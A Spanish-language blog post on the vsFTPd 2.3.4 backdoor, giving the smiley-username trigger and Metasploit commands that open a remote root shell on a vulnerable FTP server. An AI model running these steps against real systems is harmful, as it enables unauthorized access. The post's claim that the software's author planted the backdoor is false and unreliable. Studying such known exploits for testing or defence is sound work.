Inicio Linux & Systems Networks & Infrastructure Cybersecurity Cloud & DevOps SIEM & Monitoring DFIR & Threat Intel Development & Other Todas las categorias Herramientas Proyectos Sobre

Backdoor vsFTPd 2.3.4

Read in English
Backdoor vsFTPd 2.3.4

Tabla de contenidos

Bueno, ante todo perdon por la inactividad que hemos tenido estos meses pasados.

Hace poco se descubrió una grave  vulnerabilidad en el servidor vsFTPd v2.3.4,  y en el blog de Blackploit han publicado un vídeo de su explotación con metasploit.

El bug encontrado es una puerta trasera creada intencionadamente por el creador con el cual se puede acceder al FTP con permisos de administrador.
El Backdoor consiste en que accediendo al FTP y poniendo de usuario 🙂 se conseguía acceso total y ejecución de comandos en el servidor al devolver una shell del sistema. Así de simple.
Como ya os imagináis no hace falta metasploit… pero bueno.

Pasos:
text
use exploit/unix/ftp/vsftpd_234_backdoor
text
set RHOST localhost
text
set PAYLOAD cmd/unix/interact
text
exploit
text
id
text
uname -a

Fuente: blackploit

Mas información:

El smile de la muerte: Puerta trasera en vsftpd 2.3.4

Las puertas traseras más escandalosas

Comentarios